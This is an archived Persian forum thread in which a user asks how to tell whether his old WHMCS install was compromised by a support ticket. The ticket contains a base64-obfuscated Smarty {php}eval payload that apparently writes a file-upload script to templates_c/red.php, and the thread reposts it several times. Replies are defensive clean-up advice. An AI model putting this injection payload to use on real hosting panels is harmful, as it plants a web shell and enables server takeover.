PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : هک شدن


tizparvaz
March 31st, 2012, 22:37
سلام دوستان ه هکر به کاهدون زده من قبلا یه hmcs داشتم همینطوری الکی بود رو یه هاست الکی همینطوری اتفاقی رفتم تو مدیریتش الان دیدم یه تیکت اومده

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX 2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw= ='));{/php}
با این موضوع میخوام بدونم الان چطوری بفهمم کدوم فایلها آلوده شده ؟
و چطوری بر طرف کنم ؟

چون میخوام خودم رو hmcs اصلی خودم این کدرو تیکت کنم ببینم قبول میکنه یا نه چون رو این اصلیه همه تنظیمات امنیتی رو انجام دادم
php.source
March 31st, 2012, 23:37
templates_c/red.php
tizparvaz
March 31st, 2012, 23:49
templates_c/red.php

ممنون که جواب دادین لطف کردین
فقط یه سوال این مسیر همیشه ثابت یا نه
اگه نه لطف میکنید بفرمایید از کجا باید متوجه شد که مسیر چیه ؟
تو این فایل دنبال چی باید بگردم ؟
خیلی لطف کردید تشکر

---------- Post added at 10:49 PM ---------- Previous post was at 10:44 PM ----------

template_c/red.php
همچین فایلی وجود نداره
تو این فولدر همه فایلها اسمشون مثل اینه
%%C3^C3F^C3FFE86C%%configuredomains.tpl.php
php.source
March 31st, 2012, 23:51
مسیر بسته به نوع سلیقه بچه هکر تغییر میکنه
باید


JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCm Z3cml0ZSgkZm8sJGNvZGUpOw==
که base 64 هست دی کد کنی
tizparvaz
April 1st, 2012, 00:05
مسیر بسته به نوع سلیقه بچه هکر تغییر میکنه
باید


JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCm Z3cml0ZSgkZm8sJGNvZGUpOw==
که base 64 هست دی کد کنی
میشه از سایتهایی که کد و دی کد میکنن استفاده کرد یا فرق داره ؟

---------- Post added at 11:05 PM ---------- Previous post was at 11:01 PM ----------

Free online base64 encoder and decoder based on php script (http://base64-encoder-online.waraxe.us/)

این سایت دکود کرد متوجه شدم
فقط مشکل بعدی اینه که من این red.php رو داخل این فولدر پیدا نکردم
php.source
April 1st, 2012, 00:06
از هر نرم افزاری کهع میخوا استفاده کنی کن
base64 هستش
tizparvaz
April 1st, 2012, 00:09
از هر نرم افزاری کهع میخوا استفاده کنی کن
base64 هستش

خوب حالا چطور باید اینو از روی هاستم پاک کنم ؟
من اون فایلرو پیدا نمیکنم یکم راهنمایی میکنید ممنون
php.source
April 1st, 2012, 00:26
هک نشدی دیگه
تمام فایل های داخل این پوشه رو پاک کن بجز index.php
tizparvaz
April 1st, 2012, 00:34
هک نشدی دیگه
تمام فایل های داخل این پوشه رو پاک کن بجز index.php

متوجه شدم یعنی اگر هک میشدم این فایل باید ایجاد میشد

مشکل پیش نمیاد ؟
اینا برای چین اصلا ؟
tizparvaz
April 1st, 2012, 01:04
عرض کردم که این یه hmcs الکی بود دوران توفولیت نصب کرده بودم
الان گذری رفتم تو مدیریتش جالب اینه که اصلا این سایت فعال نبود در واقع اصلا هیچی نبود
تازه اون فایل هم که ایجاد نشده پس یعنی هک نشدم
من میخوام این کدرو تو hmcs اصلی خودم تستش کنم ببینم با اینکه همه چیو رعایت کردم سند میشه یا نه
اما اول باید بهمم اگر کار کرد چیکار کنم که سایتم پاکو منزه بشه
و بعد برم دنبال راه جلوگیریش
m_dg_farari
April 1st, 2012, 01:22
سلام.
جناب اگر منظورتون از "hmcs" همون نرم افزار مدیریت هاستینگ و مدیریت مالی WHMCS هستش ، این یک نرم افزار هست و ربطی هم به بخش مجازی سازی نداره... بخش مربوط به خودش رو داره.


در خمورد جلوگیری هم شما آخرین نسخه ی whmcs رو که نصب کنید خودش این باگ رو برطرف کرده. یعنی دیگه از این طریق هک نمیشید..
موفق باشید
tizparvaz
April 1st, 2012, 01:30
سلام.
جناب اگر منظورتون از "hmcs" همون نرم افزار مدیریت هاستینگ و مدیریت مالی WHMCS هستش ، این یک نرم افزار هست و ربطی هم به بخش مجازی سازی نداره... بخش مربوط به خودش رو داره.


در خمورد جلوگیری هم شما آخرین نسخه ی whmcs رو که نصب کنید خودش این باگ رو برطرف کرده. یعنی دیگه از این طریق هک نمیشید..
موفق باشید
حق با شماست عذر خواهی
چک کردم
خوشبختانه کارهایی که انجام دادم جواب میده این تیکت ارسال نمیشه اصلا